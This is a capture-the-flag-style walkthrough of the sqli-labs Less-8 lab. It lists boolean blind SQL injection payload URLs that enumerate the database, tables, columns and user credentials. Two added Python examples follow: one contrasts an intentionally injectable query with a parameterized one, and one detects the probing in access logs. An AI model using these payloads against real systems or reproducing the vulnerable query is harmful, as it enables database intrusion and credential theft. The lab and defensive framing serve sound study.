Sqlilabs-less8
1. Identify the injection point
http://127.0.0.1/sqlilabs/Less-8/?id=1' and 1=1%23
2. Find the number of columns
http://127.0.0.1/sqlilabs/Less-8/?id=1' order by 3%23
3. Determine the database
After union queries produced no output, try blind injection
(1) Determine the length of the database name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and length(database())=8 %23
(2) Determine the database name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),1,1)='s' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),2,1)='e' %23
...
Database name: security
4. Determine the tables
(1) How many tables there are
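The write-up relies on the lab showing a row for a true condition and nothing for a false one. The following added example (not from the write-up or from sqli-labs) reproduces that oracle in Python against an in-memory SQLite stand-in for a users table, placing the string-spliced query next to its parameterized form. The table rows are constructed; because SQLite has no `#` comment, the probes end in `-- ` instead of the `%23` used against MySQL on the page.

```python
import sqlite3


# Constructed in-memory stand-in for the lab's users table. The rows are made up
# for this example; they are not the lab's real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    return conn


def lookup_vulnerable(conn, user_input):
    """Splices the id parameter into the SQL text, the pattern behind the page.

    Less-8 prints a fixed message when the query returns a row and nothing
    otherwise, so the caller only learns len(result) > 0; that bit is the oracle.
    """
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % user_input
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, user_input):
    """Same query with a bound parameter: the input is a value, never SQL syntax."""
    cur = conn.execute("SELECT username FROM users WHERE id=? LIMIT 1", (user_input,))
    return [row[0] for row in cur.fetchall()]


# The page's true/false pair (' and 1=1 versus ' and 1=2). SQLite has no '#'
# comment, so '-- ' stands in for the %23 the write-up sends to MySQL.
TRUE_PROBE = "1' and 1=1 -- "
FALSE_PROBE = "1' and 1=2 -- "


def oracle_leaks(conn, lookup):
    """Return (row_shown_for_true_probe, row_shown_for_false_probe).

    (True, False) means the submitted condition decides the response, i.e. a
    working boolean oracle. (False, False) means the input stayed a literal.
    """
    return (bool(lookup(conn, TRUE_PROBE)), bool(lookup(conn, FALSE_PROBE)))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", oracle_leaks(db, lookup_vulnerable))  # (True, False)
    print("hardened:  ", oracle_leaks(db, lookup_hardened))    # (False, False)
```

Every length, substr and count probe on this page is the same one-bit question asked repeatedly; the parameterized version answers all of them with "no row", which is why prepared statements, not input filtering, are the fix.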
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 %23
(2) Determine the length of each table name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 0,1)=6 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 1,1)=8 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 2,1)=7 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 3,1)=5 %23
Database: security
Table 1: length 6
Table 2: length 8
Table 3: length 7
Table 4: length 5
(3) Determine each table name
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),2,1)='m' %23
...
Database: security
Table 1: emails
Table 2: referers
Table 3: uagents
Table 4: users
You can run this through Burp and compare response lengths to tell true from false responses
5. Determine the columns
From this we can infer that user data is probably stored in the users table
(1) Determine how many fields (columns) the table has
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name = 'users')=3 %23
······
(2) Determine the column name length
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1)=2 %23
(3) Determine the column names
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1)='i' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),2,1)='d' %23
...
Database: security
Table 1: emails, 3 columns
id
username
password
Table 2: referers
Table 3: uagents
Table 4: users
6. Read the data
(1) Determine how many rows there are
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(username) from users)=13 %23
(2) Determine the length of each value
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(username) from users limit 0,1)=4 %23
...
Running Burp gives:
Database: security
Table 1: emails, 3 columns
id
username
length 4
length 8
length 5
length 6
length 6
length 8
length 6
length 5
length 6
length 6
length 6
length 7
length 6
password
(3) Read the data
and ascii(substr((select username from users limit 0,1),1,1))=68%23
One Burp run yields the data
Passwords are handled the same way
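The Burp runs mentioned above (one request per candidate length, character or ASCII value) leave a distinctive trace in the web server's access log: one client, hundreds of near-identical GET requests whose decoded `id` parameter contains a quote followed by `and`, calls to `length`/`substr`/`ascii`, `information_schema` lookups and a trailing comment, with responses alternating between exactly two sizes. This added example (not part of the write-up) is a small Python detector for that pattern. The log lines are constructed in common log format using the page's own payloads; the indicator names and the `min_flagged` threshold are choices made for this example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log sample (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqlilabs/Less-8/?id=1 HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%201%3D1%23 HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20length(database())%3D8%20%23 HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database()%2C1%2C1)%3D%27s%27%20%23 HTTP/1.1" 200 713
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database()%2C1%2C1)%3D%27t%27%20%23 HTTP/1.1" 200 693
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-8/?id=2 HTTP/1.1" 200 715
"""

# Indicators of boolean-based blind probing, matched against the URL-decoded query string.
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(?:and|or)\b", re.I),
    "char_probe_function": re.compile(r"\b(?:substr|substring|mid|ascii|ord|length|char_length)\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\.|\bdatabase\s*\(\)", re.I),
    "sql_comment": re.compile(r"(?:#|--\s|/\*)"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def flag_request(raw_target):
    """Return the names of the indicators present in a request target's query string."""
    decoded = unquote_plus(urlsplit(raw_target).query)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def analyze(log_text):
    """Per-client counts: total requests, flagged requests, indicator tallies, and the
    set of response sizes seen on flagged requests (two sizes = a true/false oracle)."""
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0, "indicators": Counter(), "sizes": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        rec = per_ip[m["ip"]]
        rec["requests"] += 1
        hits = flag_request(m["target"])
        if hits:
            rec["flagged"] += 1
            rec["indicators"].update(hits)
            rec["sizes"].add(int(m["size"]) if m["size"] != "-" else 0)
    return per_ip


def suspicious_clients(log_text, min_flagged=3):
    """Clients with at least min_flagged flagged requests (threshold chosen for this example)."""
    stats = analyze(log_text)
    return sorted(ip for ip, s in stats.items() if s["flagged"] >= min_flagged)


if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, s["requests"], s["flagged"], dict(s["indicators"]), sorted(s["sizes"]))
    print("suspicious:", suspicious_clients(SAMPLE_LOG))  # ['10.0.0.5']
```

In the sample the probing client shows exactly two response sizes across its flagged requests, which is the same signal the write-up uses from the attacker's side with Burp; on a real server, a size set of two combined with a high flagged count is the signature to alert on, and the per-indicator tallies tell the responder which stage (schema, table, column, row) the enumeration had reached.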